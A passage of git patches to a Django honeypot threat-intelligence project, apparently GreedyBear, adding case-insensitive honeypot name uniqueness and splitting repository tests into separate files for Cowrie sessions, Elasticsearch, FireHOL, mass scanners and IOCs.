+ old_entry = FireHolList.objects.create(ip_address="4.4.4.4", source="test")
+ FireHolList.objects.filter(pk=old_entry.pk).update(added=old_date)
+
+ deleted_count = self.repo.cleanup_old_entries(days=60)
+
+ self.assertEqual(deleted_count, 1)
+
+
+class TestMassScannerRepository(CustomTestCase):
+ """Tests for MassScannerRepository."""
+
+ def setUp(self):
+ self.repo = MassScannerRepository()
+
+ def test_get_or_create_creates_new_entry(self):
+ scanner, created = self.repo.get_or_create("1.2.3.4", "test scanner")
+
+ self.assertTrue(created)
+ self.assertEqual(scanner.ip_address, "1.2.3.4")
+ self.assertEqual(scanner.reason, "test scanner")
+ self.assertTrue(MassScanner.objects.filter(ip_address="1.2.3.4").exists())
+
+ def test_get_or_create_returns_existing(self):
+ MassScanner.objects.create(ip_address="5.6.7.8", reason="existing")
+
+ scanner, created = self.repo.get_or_create("5.6.7.8", "new reason")
+
+ self.assertFalse(created)
+ self.assertEqual(scanner.ip_address, "5.6.7.8")
+ # Should keep original reason, not update it
+ self.assertEqual(scanner.reason, "existing")
+ self.assertEqual(MassScanner.objects.filter(ip_address="5.6.7.8").count(), 1)
+
+ def test_get_or_create_without_reason(self):
+ scanner, created = self.repo.get_or_create("7.7.7.7")
+
+ self.assertTrue(created)
+ self.assertEqual(scanner.ip_address, "7.7.7.7")
+ self.assertEqual(scanner.reason, "")
From 6bb224b304ca586d124906637292d0e0efc41328 Mon Sep 17 00:00:00 2001
From: Drona Raj Gyawali
Date: Tue, 13 Jan 2026 20:58:26 +0545
Subject: [PATCH 42/75] refactor : honeypot creation and enforce
case-insensitive uniqueness . Closes #689 (#693)
* refactor(repository): enforce case-insensitive uniqueness and handle IntegrityError
* refactor: code
* refactor: create_honeypot doc & log addition
---
greedybear/cronjobs/repositories/ioc.py | 26 ++++++---
...honeypot_unique_generalhoneypot_name_ci.py | 18 +++++++
greedybear/models.py | 4 ++
tests/__init__.py | 6 +--
tests/test_repositories.py | 54 +++++++++++++++++--
5 files changed, 96 insertions(+), 12 deletions(-)
create mode 100644 greedybear/migrations/0028_generalhoneypot_unique_generalhoneypot_name_ci.py
diff --git a/greedybear/cronjobs/repositories/ioc.py b/greedybear/cronjobs/repositories/ioc.py
index f2fdb3a2..29032cea 100644
--- a/greedybear/cronjobs/repositories/ioc.py
+++ b/greedybear/cronjobs/repositories/ioc.py
@@ -1,6 +1,7 @@
import logging
from django.contrib.postgres.aggregates import ArrayAgg
+from django.db import IntegrityError
from django.db.models import F, Q
from greedybear.models import IOC, GeneralHoneypot
@@ -46,19 +47,32 @@ def add_honeypot_to_ioc(self, honeypot_name: str, ioc: IOC) -> IOC:
def create_honeypot(self, honeypot_name: str) -> GeneralHoneypot:
"""
- Create a new honeypot and save it to the database.
+ Create a new honeypot or return an existing one.
+
+ If a honeypot with the same name (case-insensitive) already exists,
+ recover and return the existing one instead. This method also updates
+ the internal honeypot cache accordingly.
Args:
honeypot_name: Name for the new honeypot.
Returns:
- The newly created GeneralHoneypot instance.
+ A GeneralHoneypot instance (newly created or existing).
"""
normalized = self._normalize_name(honeypot_name)
- self.log.debug(f"creating honeypot {honeypot_name}")
- honeypot = GeneralHoneypot(name=honeypot_name, active=True)
- honeypot.save()
- self._honeypot_cache[normalized] = True
+
+ try:
+ honeypot = GeneralHoneypot.objects.create(
+ name=honeypot_name,
+ active=True,
+ )
+ except IntegrityError as e:
+ self.log.error(f"IntegrityError creating honeypot '{honeypot_name}': {e}")
+ honeypot = self.get_hp_by_name(honeypot_name)
+ if honeypot is None:
+ raise e
+
+ self._honeypot_cache[normalized] = honeypot.active
return honeypot
def get_active_honeypots(self) -> list[GeneralHoneypot]:
diff --git a/greedybear/migrations/0028_generalhoneypot_unique_generalhoneypot_name_ci.py b/greedybear/migrations/0028_generalhoneypot_unique_generalhoneypot_name_ci.py
new file mode 100644
index 00000000..707c256e
--- /dev/null
+++ b/greedybear/migrations/0028_generalhoneypot_unique_generalhoneypot_name_ci.py
@@ -0,0 +1,18 @@
+# Generated by Django 5.2.8 on 2026-01-09 15:53
+
+import django.db.models.functions.text
+from django.db import migrations, models
+
+
+class Migration(migrations.Migration):
+
+ dependencies = [
+ ('greedybear', '0027_disable_unwanted_honeypots'),
+ ]
+
+ operations = [
+ migrations.AddConstraint(
+ model_name='generalhoneypot',
+ constraint=models.UniqueConstraint(django.db.models.functions.text.Lower('name'), name='unique_generalhoneypot_name_ci'),
+ ),
+ ]
diff --git a/greedybear/models.py b/greedybear/models.py
index 6221e58f..2f0d6a76 100644
--- a/greedybear/models.py
+++ b/greedybear/models.py
@@ -4,6 +4,7 @@
from django.contrib.postgres import fields as pg_fields
from django.db import models
+from django.db.models.functions import Lower
class ViewType(models.TextChoices):
@@ -29,6 +30,9 @@ class GeneralHoneypot(models.Model):
name = models.CharField(max_length=15, blank=False)
active = models.BooleanField(blank=False, default=True)
+ class Meta:
+ constraints = [models.UniqueConstraint(Lower("name"), name="unique_generalhoneypot_name_ci")]
+
def __str__(self):
return self.name
diff --git a/tests/__init__.py b/tests/__init__.py
index 6cb71ac9..a22d4d87 100644
--- a/tests/__init__.py
+++ b/tests/__init__.py
@@ -19,9 +19,9 @@ class CustomTestCase(TestCase):
def setUpTestData(cls):
super().setUpTestData()
- cls.heralding = GeneralHoneypot.objects.create(name="Heralding", active=True)
- cls.ciscoasa = GeneralHoneypot.objects.create(name="Ciscoasa", active=True)
- cls.ddospot = GeneralHoneypot.objects.create(name="Ddospot", active=False)
+ cls.heralding = GeneralHoneypot.objects.get_or_create(name="Heralding", defaults={"active": True})[0]
+ cls.ciscoasa = GeneralHoneypot.objects.get_or_create(name="Ciscoasa", defaults={"active": True})[0]
+ cls.ddospot = GeneralHoneypot.objects.get_or_create(name="Ddospot", defaults={"active": False})[0]
cls.current_time = datetime.now()
cls.ioc = IOC.objects.create(
diff --git a/tests/test_repositories.py b/tests/test_repositories.py
index 167e70d2..ff2647d0 100644
--- a/tests/test_repositories.py
+++ b/tests/test_repositories.py
@@ -1,7 +1,7 @@
from datetime import datetime
from unittest.mock import Mock, patch
-from django.db import IntegrityError
+from django.db import IntegrityError, transaction
from greedybear.cronjobs.repositories import (
CowrieSessionRepository,
@@ -161,11 +161,11 @@ def test_get_hp_by_name_insensitive(self):
self.assertIsNotNone(result)
def test_disabled_honeypot_case_insensitive(self):
- GeneralHoneypot.objects.create(name="Heralding", active=False)
+ GeneralHoneypot.objects.create(name="Testpot69", active=False)
# reiniting repo after DB change to refresh the cache
repo = IocRepository()
- result = repo.is_ready_for_extraction("heralding")
+ result = repo.is_ready_for_extraction("testpot69")
self.assertFalse(result)
def test_special_and_normal_honeypots(self):
@@ -178,6 +178,54 @@ def test_special_and_normal_honeypots(self):
self.assertFalse(repo.is_ready_for_extraction("NormalPot"))
self.assertFalse(repo.is_ready_for_extraction("normalpot"))
+ def test_create_honeypot_case_insensitive_uniqueness(self):
+ initial_count = GeneralHoneypot.objects.count()
+ GeneralHoneypot.objects.create(name="TestPot123", active=True)
+ self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
+
+ with self.assertRaises(IntegrityError):
+ with transaction.atomic():
+ GeneralHoneypot.objects.create(name="testpot123", active=True)
+
+ self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
+ self.assertEqual(GeneralHoneypot.objects.get(name__iexact="testpot123").name, "TestPot123")
+
+ def test_create_honeypot_integrity_error_handling(self):
+ initial_count = GeneralHoneypot.objects.count()
+ GeneralHoneypot.objects.create(name="Log4PotTest123", active=True)
+
+ try:
+ with transaction.atomic():
+ GeneralHoneypot.objects.create(name="log4pottest123", active=True)
+ except IntegrityError:
+ hp = GeneralHoneypot.objects.filter(name__iexact="log4pottest123").first()
+
+ self.assertEqual(hp.name, "Log4PotTest123")
+ self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
+
+ def test_create_new_honeypot_creates_and_updates_cache(self):
+ self.repo._honeypot_cache.clear()
+ hp = self.repo.create_honeypot("UniqueNewPot123")
+ self.assertEqual(hp.name, "UniqueNewPot123")
+ self.assertTrue("uniquenewpot123" in self.repo._honeypot_cache)
+ self.assertTrue(hp.active)
+
+ db_hp = GeneralHoneypot.objects.get(name="UniqueNewPot123")
+ self.assertEqual(db_hp.name, "UniqueNewPot123")
+ self.assertTrue(db_hp.active)
+
+ def test_honeypot_unique_constraint_case_insensitive(self):
+ initial_count = GeneralHoneypot.objects.count()
+ hp1 = self.repo.create_honeypot("TestPot456")
+ self.assertIsNotNone(hp1)
+
+ with self.assertRaises(IntegrityError):
+ with transaction.atomic():
+ GeneralHoneypot.objects.create(name="testpot456", active=True)
+
+ self.assertEqual(GeneralHoneypot.objects.filter(name__iexact="testpot456").count(), 1)
+ self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
+
def test_get_scanners_for_scoring_returns_scanners(self):
# Create scanners
IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True)
From 85b6948d60d2107b20c05bce1a163c946010b9a9 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Tue, 13 Jan 2026 22:10:45 +0530
Subject: [PATCH 43/75] Split test_repositories.py into separate files for
better maintainability. Closes #703 (#704)
* Split test_repositories.py into separate files (#703)
- Split 1111-line test_repositories.py into 6 focused test files
- test_ioc_repository.py (561 lines): IOC and scoring tests
- test_sensor_repository.py (58 lines): Sensor tests
- test_cowrie_session_repository.py (175 lines): Cowrie session tests
- test_elastic_repository.py (224 lines): Elasticsearch tests
- test_firehol_repository.py (39 lines): FireHol tests
- test_mass_scanner_repository.py (37 lines): Mass scanner tests
- All 101 tests pass successfully
- Improved maintainability and navigation
* Use assertIn instead of assertTrue for better error messages
Applied Copilot suggestion to improve test assertion readability.
Replace assertTrue(x in y) with assertIn(x, y) for more informative
error messages when tests fail.
---
tests/test_cowrie_session_repository.py | 175 ++++
tests/test_elastic_repository.py | 224 +++++
tests/test_firehol_repository.py | 39 +
tests/test_ioc_repository.py | 561 ++++++++++++
tests/test_mass_scanner_repository.py | 37 +
tests/test_repositories.py | 1111 -----------------------
tests/test_sensor_repository.py | 58 ++
7 files changed, 1094 insertions(+), 1111 deletions(-)
create mode 100644 tests/test_cowrie_session_repository.py
create mode 100644 tests/test_elastic_repository.py
create mode 100644 tests/test_firehol_repository.py
create mode 100644 tests/test_ioc_repository.py
create mode 100644 tests/test_mass_scanner_repository.py
delete mode 100644 tests/test_repositories.py
create mode 100644 tests/test_sensor_repository.py
diff --git a/tests/test_cowrie_session_repository.py b/tests/test_cowrie_session_repository.py
new file mode 100644
index 00000000..3f245a9c
--- /dev/null
+++ b/tests/test_cowrie_session_repository.py
@@ -0,0 +1,175 @@
+from datetime import datetime, timedelta
+
+from django.db import IntegrityError
+
+from greedybear.cronjobs.repositories import CowrieSessionRepository
+from greedybear.models import IOC, CommandSequence, CowrieSession
+
+from . import CustomTestCase
+
+
+class TestCowrieSessionRepository(CustomTestCase):
+ def setUp(self):
+ self.repo = CowrieSessionRepository()
+
+ def test_get_or_create_session_creates_new(self):
+ source_ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+ result = self.repo.get_or_create_session(session_id="123456", source=source_ioc)
+ self.assertIsNotNone(result)
+ self.assertEqual(result.session_id, int("123456", 16))
+ self.assertEqual(result.source, source_ioc)
+
+ def test_get_or_create_session_returns_existing(self):
+ existing_session_id = "ffffffffffff"
+ source = self.cowrie_session.source
+ result = self.repo.get_or_create_session(existing_session_id, source=source)
+ self.assertEqual(result.pk, int(existing_session_id, 16))
+ self.assertTrue(result.login_attempt)
+
+ def test_get_or_create_raises_on_invalid_session_id(self):
+ session_id = "gggggggggggg"
+ source = IOC.objects.create(name="1.2.3.4", type="ip")
+ with self.assertRaises(ValueError):
+ self.repo.get_or_create_session(session_id, source=source)
+
+ def test_save_session_persists_to_database(self):
+ source_ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+ session = CowrieSession(session_id=12345, source=source_ioc)
+ result = self.repo.save_session(session)
+ self.assertIsNotNone(result.pk)
+ self.assertTrue(CowrieSession.objects.filter(session_id=12345).exists())
+
+ def test_save_session_updates_existing(self):
+ existing_session_id = "ffffffffffff"
+ source = self.cowrie_session.source
+ session = self.repo.get_or_create_session(existing_session_id, source=source)
+
+ original_interaction_count = session.interaction_count
+ session.interaction_count = 10
+ result = self.repo.save_session(session)
+ self.assertEqual(result.interaction_count, 10)
+ self.assertEqual(
+ CowrieSession.objects.get(session_id=int(existing_session_id, 16)).interaction_count,
+ 10,
+ )
+
+ session.interaction_count = original_interaction_count
+ result = self.repo.save_session(session)
+ self.assertEqual(result.interaction_count, original_interaction_count)
+ self.assertEqual(
+ CowrieSession.objects.get(session_id=int(existing_session_id, 16)).interaction_count,
+ original_interaction_count,
+ )
+
+ def test_get_command_sequence_by_hash_returns_existing(self):
+ existing = self.command_sequence
+ result = self.repo.get_command_sequence_by_hash(existing.commands_hash)
+ self.assertIsNotNone(result)
+ self.assertEqual(result.pk, existing.pk)
+ self.assertEqual(result.commands_hash, existing.commands_hash)
+
+ def test_get_command_sequence_by_hash_returns_none_for_missing(self):
+ result = self.repo.get_command_sequence_by_hash("nonexistent")
+ self.assertIsNone(result)
+
+ def test_save_command_sequence_persists_to_database(self):
+ cmd_seq = CommandSequence(
+ commands=["ls", "pwd", "whoami"],
+ commands_hash="def456",
+ )
+ result = self.repo.save_command_sequence(cmd_seq)
+ self.assertIsNotNone(result.pk)
+ self.assertTrue(CommandSequence.objects.filter(commands_hash="def456").exists())
+
+ def test_save_command_sequence_updates_existing(self):
+ existing = self.command_sequence
+ existing.last_seen = datetime(2025, 1, 2)
+ self.repo.save_command_sequence(existing)
+ updated = CommandSequence.objects.get(commands_hash=existing.commands_hash)
+ self.assertEqual(updated.last_seen.date(), datetime(2025, 1, 2).date())
+
+ def test_get_or_create_session_with_hex_session_id(self):
+ session_id = "abc123"
+ source_ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+ result = self.repo.get_or_create_session(session_id=session_id, source=source_ioc)
+ self.assertEqual(result.session_id, int(session_id, 16))
+
+ def test_command_sequence_unique_hash_constraint(self):
+ existing = self.command_sequence
+ with self.assertRaises(IntegrityError):
+ CommandSequence.objects.create(
+ commands=["different", "commands"],
+ commands_hash=existing.commands_hash,
+ )
+
+
+class TestCowrieSessionRepositoryCleanup(CustomTestCase):
+ """Tests for cleanup-related methods in CowrieSessionRepository."""
+
+ def setUp(self):
+ self.repo = CowrieSessionRepository()
+
+ def test_delete_old_command_sequences(self):
+ old_date = datetime.now() - timedelta(days=40)
+ recent_date = datetime.now() - timedelta(days=5)
+
+ CommandSequence.objects.create(commands=["ls"], commands_hash="old_hash", last_seen=old_date)
+ CommandSequence.objects.create(commands=["pwd"], commands_hash="recent_hash", last_seen=recent_date)
+
+ cutoff = datetime.now() - timedelta(days=30)
+ deleted_count = self.repo.delete_old_command_sequences(cutoff)
+
+ self.assertEqual(deleted_count, 1)
+ self.assertFalse(CommandSequence.objects.filter(commands_hash="old_hash").exists())
+ self.assertTrue(CommandSequence.objects.filter(commands_hash="recent_hash").exists())
+
+ def test_delete_incomplete_sessions(self):
+ source = IOC.objects.create(name="1.2.3.4", type="ip")
+
+ CowrieSession.objects.create(session_id=123, source=source, start_time=None)
+ CowrieSession.objects.create(session_id=456, source=source, start_time=datetime.now())
+
+ deleted_count = self.repo.delete_incomplete_sessions()
+
+ self.assertEqual(deleted_count, 1)
+ self.assertFalse(CowrieSession.objects.filter(session_id=123).exists())
+ self.assertTrue(CowrieSession.objects.filter(session_id=456).exists())
+
+ def test_delete_sessions_without_login(self):
+ source = IOC.objects.create(name="1.2.3.4", type="ip")
+ old_date = datetime.now() - timedelta(days=40)
+ recent_date = datetime.now() - timedelta(days=5)
+
+ # Old session without login
+ CowrieSession.objects.create(session_id=111, source=source, start_time=old_date, login_attempt=False)
+ # Recent session without login
+ CowrieSession.objects.create(session_id=222, source=source, start_time=recent_date, login_attempt=False)
+ # Old session with login
+ CowrieSession.objects.create(session_id=333, source=source, start_time=old_date, login_attempt=True)
+
+ cutoff = datetime.now() - timedelta(days=30)
+ deleted_count = self.repo.delete_sessions_without_login(cutoff)
+
+ self.assertEqual(deleted_count, 1)
+ self.assertFalse(CowrieSession.objects.filter(session_id=111).exists())
+ self.assertTrue(CowrieSession.objects.filter(session_id=222).exists())
+ self.assertTrue(CowrieSession.objects.filter(session_id=333).exists())
+
+ def test_delete_sessions_without_commands(self):
+ source = IOC.objects.create(name="1.2.3.4", type="ip")
+ old_date = datetime.now() - timedelta(days=40)
+
+ # Session without commands
+ CowrieSession.objects.create(session_id=777, source=source, start_time=old_date)
+ # Session with commands
+ session_with_cmd = CowrieSession.objects.create(session_id=888, source=source, start_time=old_date)
+ cmd_seq = CommandSequence.objects.create(commands=["ls"], commands_hash="hash1")
+ session_with_cmd.commands = cmd_seq
+ session_with_cmd.save()
+
+ cutoff = datetime.now() - timedelta(days=30)
+ deleted_count = self.repo.delete_sessions_without_commands(cutoff)
+
+ self.assertEqual(deleted_count, 1)
+ self.assertFalse(CowrieSession.objects.filter(session_id=777).exists())
+ self.assertTrue(CowrieSession.objects.filter(session_id=888).exists())
diff --git a/tests/test_elastic_repository.py b/tests/test_elastic_repository.py
new file mode 100644
index 00000000..54cd92ea
--- /dev/null
+++ b/tests/test_elastic_repository.py
@@ -0,0 +1,224 @@
+from datetime import datetime
+from unittest.mock import Mock, patch
+
+from greedybear.cronjobs.repositories import ElasticRepository, get_time_window
+
+from . import CustomTestCase
+
+
+class TestElasticRepository(CustomTestCase):
+ def setUp(self):
+ self.mock_client = Mock()
+ self.mock_client.ping.return_value = True
+
+ patcher = patch("greedybear.cronjobs.repositories.elastic.settings")
+ self.mock_settings = patcher.start()
+ self.mock_settings.ELASTIC_CLIENT = self.mock_client
+ self.addCleanup(patcher.stop)
+
+ self.repo = ElasticRepository()
+
+ @patch("greedybear.cronjobs.repositories.elastic.Search")
+ def test_has_honeypot_been_hit_returns_true_when_hits_exist(self, mock_search_class):
+ mock_search = Mock()
+ mock_search_class.return_value = mock_search
+ mock_q = Mock()
+ with patch.object(self.repo, "_standard_query", return_value=mock_q):
+ mock_search.query.return_value = mock_search
+ mock_search.filter.return_value = mock_search
+ mock_search.count.return_value = 1
+
+ result = self.repo.has_honeypot_been_hit(minutes_back_to_lookup=10, honeypot_name="test_honeypot")
+ self.assertTrue(result)
+ mock_search.query.assert_called_once_with(mock_q)
+ mock_search.filter.assert_called_once_with("term", **{"type.keyword": "test_honeypot"})
+ mock_search.count.assert_called_once()
+
+ @patch("greedybear.cronjobs.repositories.elastic.Search")
+ def test_has_honeypot_been_hit_returns_false_when_no_hits(self, mock_search_class):
+ mock_search = Mock()
+ mock_search_class.return_value = mock_search
+ mock_q = Mock()
+ with patch.object(self.repo, "_standard_query", return_value=mock_q):
+ mock_search.query.return_value = mock_search
+ mock_search.filter.return_value = mock_search
+ mock_search.count.return_value = 0
+
+ result = self.repo.has_honeypot_been_hit(minutes_back_to_lookup=10, honeypot_name="test_honeypot")
+
+ self.assertFalse(result)
+ mock_search.query.assert_called_once_with(mock_q)
+ mock_search.filter.assert_called_once_with("term", **{"type.keyword": "test_honeypot"})
+ mock_search.count.assert_called_once()
+
+ def test_healthcheck_passes_when_ping_succeeds(self):
+ self.mock_client.ping.return_value = True
+ self.repo._healthcheck()
+ self.mock_client.ping.assert_called_once()
+
+ def test_healthcheck_raises_when_ping_fails(self):
+ self.mock_client.ping.return_value = False
+ with self.assertRaises(ElasticRepository.ElasticServerDownError) as ctx:
+ self.repo._healthcheck()
+ self.assertIn("not reachable", str(ctx.exception))
+
+ @patch("greedybear.cronjobs.repositories.elastic.Search")
+ @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", False)
+ def test_search_returns_cached_list_not_generator(self, mock_search_class):
+ mock_search = Mock()
+ mock_search_class.return_value = mock_search
+ mock_search.query.return_value = mock_search
+ mock_search.source.return_value = mock_search
+
+ mock_hits = [{"name": f"hit{i}", "@timestamp": i} for i in range(20_000)]
+ mock_search.scan.return_value = iter(mock_hits)
+
+ first_iteration = list(self.repo.search(minutes_back_to_lookup=10))
+ second_iteration = list(self.repo.search(minutes_back_to_lookup=10))
+ self.assertEqual(len(first_iteration), 20_000)
+ self.assertEqual(len(second_iteration), 20_000)
+
+ @patch("greedybear.cronjobs.repositories.elastic.Search")
+ @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", False)
+ def test_search_returns_ordered_list(self, mock_search_class):
+ mock_search = Mock()
+ mock_search_class.return_value = mock_search
+ mock_search.query.return_value = mock_search
+ mock_search.source.return_value = mock_search
+
+ mock_hits = [{"name": f"hit{i}", "@timestamp": i % 7} for i in range(20_000)]
+ mock_search.scan.return_value = iter(mock_hits)
+
+ result = list(self.repo.search(minutes_back_to_lookup=10))
+ is_ordered = all(a["@timestamp"] <= b["@timestamp"] for a, b in zip(result, result[1:], strict=False))
+ self.assertTrue(is_ordered)
+
+ @patch("greedybear.cronjobs.repositories.elastic.Search")
+ @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", True)
+ def test_search_legacy_mode_uses_relative_time(self, mock_search_class):
+ """Test legacy extraction uses relative time queries"""
+ mock_search = Mock()
+ mock_search_class.return_value = mock_search
+ mock_search.query.return_value = mock_search
+ mock_search.source.return_value = mock_search
+ mock_search.scan.return_value = iter([])
+
+ # Verify query was called (legacy mode uses different query structure)
+ self.repo.search(minutes_back_to_lookup=11)
+ mock_search.query.assert_called_once()
+
+ @patch("greedybear.cronjobs.repositories.elastic.Search")
+ @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", False)
+ @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
+ def test_search_non_legacy_uses_time_window(self, mock_get_time_window, mock_search_class):
+ """Test non-legacy extraction uses get_time_window"""
+ mock_search = Mock()
+ mock_search_class.return_value = mock_search
+ mock_search.query.return_value = mock_search
+ mock_search.source.return_value = mock_search
+ mock_search.scan.return_value = iter([])
+
+ window_start = datetime(2025, 1, 1, 12, 0, 0)
+ window_end = datetime(2025, 1, 1, 12, 10, 0)
+ mock_get_time_window.return_value = (window_start, window_end)
+
+ self.repo.search(minutes_back_to_lookup=10)
+
+ mock_get_time_window.assert_called_once()
+
+ @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
+ @patch("greedybear.cronjobs.repositories.elastic.datetime")
+ def test_standard_query_returns_correct_query(self, mock_datetime, mock_get_time_window):
+ now = datetime(2023, 1, 1, 0, 0, 0)
+ mock_datetime.now.return_value = now
+ window_start = "2022-12-31T23:50:00"
+ window_end = "2023-01-01T00:00:00"
+ mock_get_time_window.return_value = (window_start, window_end)
+
+ q = self.repo._standard_query(minutes_back_to_lookup=10)
+
+ expected_dict = {"range": {"@timestamp": {"gte": window_start, "lt": window_end}}}
+ self.assertEqual(q.to_dict(), expected_dict)
+ mock_get_time_window.assert_called_once_with(now, 10)
+
+
+class TestTimeWindowCalculation(CustomTestCase):
+ def test_basic_10min_window(self):
+ """Test a basic window without custom lookback"""
+ reference = datetime(2024, 1, 10, 14, 23) # 14:23
+ start, end = get_time_window(reference, lookback_minutes=10, extraction_interval=10)
+
+ expected_end = datetime(2024, 1, 10, 14, 20) # 14:20
+ expected_start = datetime(2024, 1, 10, 14, 10) # 14:10
+
+ self.assertEqual(start, expected_start)
+ self.assertEqual(end, expected_end)
+
+ def test_with_custom_lookback(self):
+ """Test window with custom lookback time"""
+ reference = datetime(2024, 1, 10, 14, 23) # 14:23
+ start, end = get_time_window(reference, lookback_minutes=15, extraction_interval=10)
+
+ expected_end = datetime(2024, 1, 10, 14, 20) # 14:20
+ expected_start = datetime(2024, 1, 10, 14, 5) # 14:05
+
+ self.assertEqual(start, expected_start)
+ self.assertEqual(end, expected_end)
+
+ def test_with_custom_extraction_interval(self):
+ """Test window with custom extraction interval time"""
+ reference = datetime(2024, 1, 10, 14, 23) # 14:23
+ start, end = get_time_window(reference, lookback_minutes=15, extraction_interval=15)
+
+ expected_end = datetime(2024, 1, 10, 14, 15) # 14:15
+ expected_start = datetime(2024, 1, 10, 14, 00) # 14:00
+
+ self.assertEqual(start, expected_start)
+ self.assertEqual(end, expected_end)
+
+ def test_exact_boundary(self):
+ """Test behavior when reference time is exactly on a window boundary"""
+ reference = datetime(2024, 1, 10, 14, 20) # 14:20 exactly
+ start, end = get_time_window(reference, lookback_minutes=10, extraction_interval=10)
+
+ expected_end = datetime(2024, 1, 10, 14, 20) # 14:20
+ expected_start = datetime(2024, 1, 10, 14, 10) # 14:10
+
+ self.assertEqual(start, expected_start)
+ self.assertEqual(end, expected_end)
+
+ def test_invalid_lookback(self):
+ """Test that function raises ValueError for invalid lookback"""
+ reference = datetime(2024, 1, 10, 14, 23)
+
+ with self.assertRaises(ValueError):
+ get_time_window(reference, lookback_minutes=5, extraction_interval=10)
+
+ def test_invalid_extraction_interval(self):
+ """Test that function raises ValueError for invalid extraction interval"""
+ reference = datetime(2024, 1, 10, 14, 23)
+
+ with self.assertRaises(ValueError):
+ get_time_window(reference, lookback_minutes=10, extraction_interval=9)
+
+ def test_day_boundary_crossing(self):
+ """Test behavior when window crosses a day boundary"""
+ reference = datetime(2024, 1, 11, 0, 5) # 00:00
+ start, end = get_time_window(reference, lookback_minutes=10, extraction_interval=10)
+
+ expected_end = datetime(2024, 1, 11, 0, 0) # 00:00
+ expected_start = datetime(2024, 1, 10, 23, 50) # 23:50 on previous day
+
+ self.assertEqual(start, expected_start)
+ self.assertEqual(end, expected_end)
+
+ def test_large_lookback(self):
+ """Test with a large lookback that crosses multiple days"""
+ reference = datetime(2024, 1, 10, 14, 23) # 14:23
+ start, end = get_time_window(reference, lookback_minutes=60 * 24 * 3, extraction_interval=10)
+
+ expected_end = datetime(2024, 1, 10, 14, 20) # 14:20
+ expected_start = datetime(2024, 1, 7, 14, 20) # 14:20, 3 days earlier
+
+ self.assertEqual(start, expected_start)
+ self.assertEqual(end, expected_end)
diff --git a/tests/test_firehol_repository.py b/tests/test_firehol_repository.py
new file mode 100644
index 00000000..11317194
--- /dev/null
+++ b/tests/test_firehol_repository.py
@@ -0,0 +1,39 @@
+from datetime import datetime, timedelta
+
+from greedybear.cronjobs.repositories import FireHolRepository
+from greedybear.models import FireHolList
+
+from . import CustomTestCase
+
+
+class TestFireHolRepository(CustomTestCase):
+ """Tests for FireHolRepository."""
+
+ def setUp(self):
+ self.repo = FireHolRepository()
+
+ def test_get_or_create_creates_new_entry(self):
+ entry, created = self.repo.get_or_create("1.2.3.4", "blocklist_de")
+
+ self.assertTrue(created)
+ self.assertEqual(entry.ip_address, "1.2.3.4")
+ self.assertEqual(entry.source, "blocklist_de")
+ self.assertTrue(FireHolList.objects.filter(ip_address="1.2.3.4", source="blocklist_de").exists())
+
+ def test_get_or_create_returns_existing(self):
+ FireHolList.objects.create(ip_address="5.6.7.8", source="greensnow")
+
+ entry, created = self.repo.get_or_create("5.6.7.8", "greensnow")
+
+ self.assertFalse(created)
+ self.assertEqual(entry.ip_address, "5.6.7.8")
+ self.assertEqual(FireHolList.objects.filter(ip_address="5.6.7.8", source="greensnow").count(), 1)
+
+ def test_cleanup_old_entries_custom_days(self):
+ old_date = datetime.now() - timedelta(days=65)
+ old_entry = FireHolList.objects.create(ip_address="4.4.4.4", source="test")
+ FireHolList.objects.filter(pk=old_entry.pk).update(added=old_date)
+
+ deleted_count = self.repo.cleanup_old_entries(days=60)
+
+ self.assertEqual(deleted_count, 1)
diff --git a/tests/test_ioc_repository.py b/tests/test_ioc_repository.py
new file mode 100644
index 00000000..56ec7b7f
--- /dev/null
+++ b/tests/test_ioc_repository.py
@@ -0,0 +1,561 @@
+from datetime import datetime, timedelta
+from unittest.mock import Mock
+
+from django.db import IntegrityError, transaction
+
+from greedybear.cronjobs.repositories import IocRepository
+from greedybear.models import IOC, GeneralHoneypot
+
+from . import CustomTestCase
+
+
+class TestIocRepository(CustomTestCase):
+ def setUp(self):
+ self.repo = IocRepository()
+
+ def test_get_ioc_by_name_returns_existing(self):
+ result = self.repo.get_ioc_by_name("140.246.171.141")
+ self.assertIsNotNone(result)
+ self.assertEqual(result.name, "140.246.171.141")
+
+ def test_get_ioc_by_name_returns_none_for_missing(self):
+ result = self.repo.get_ioc_by_name("8.8.8.8")
+ self.assertIsNone(result)
+
+ def test_save_creates_new_ioc(self):
+ ioc = IOC(name="1.2.3.4", type="ip")
+ result = self.repo.save(ioc)
+ self.assertIsNotNone(result.pk)
+ self.assertTrue(IOC.objects.filter(name="1.2.3.4").exists())
+
+ def test_save_updates_existing_ioc(self):
+ ioc = self.repo.get_ioc_by_name("140.246.171.141")
+ original_attack_count = ioc.attack_count
+
+ ioc.attack_count = 10
+ result = self.repo.save(ioc)
+ self.assertEqual(result.attack_count, 10)
+ self.assertEqual(IOC.objects.get(name="140.246.171.141").attack_count, 10)
+
+ ioc.attack_count = original_attack_count
+ result = self.repo.save(ioc)
+ self.assertEqual(result.attack_count, original_attack_count)
+ self.assertEqual(IOC.objects.get(name="140.246.171.141").attack_count, original_attack_count)
+
+ def test_create_honeypot(self):
+ self.repo.create_honeypot("NewHoneypot")
+ self.assertTrue(GeneralHoneypot.objects.filter(name="NewHoneypot").exists())
+ hp = GeneralHoneypot.objects.get(name="NewHoneypot")
+ self.assertTrue(hp.active)
+
+ def test_get_active_honeypots_returns_only_active(self):
+ GeneralHoneypot.objects.create(name="TestActivePot1", active=True)
+ GeneralHoneypot.objects.create(name="TestActivePot2", active=True)
+ GeneralHoneypot.objects.create(name="TestInactivePot", active=False)
+
+ result = self.repo.get_active_honeypots()
+ names = [hp.name for hp in result]
+
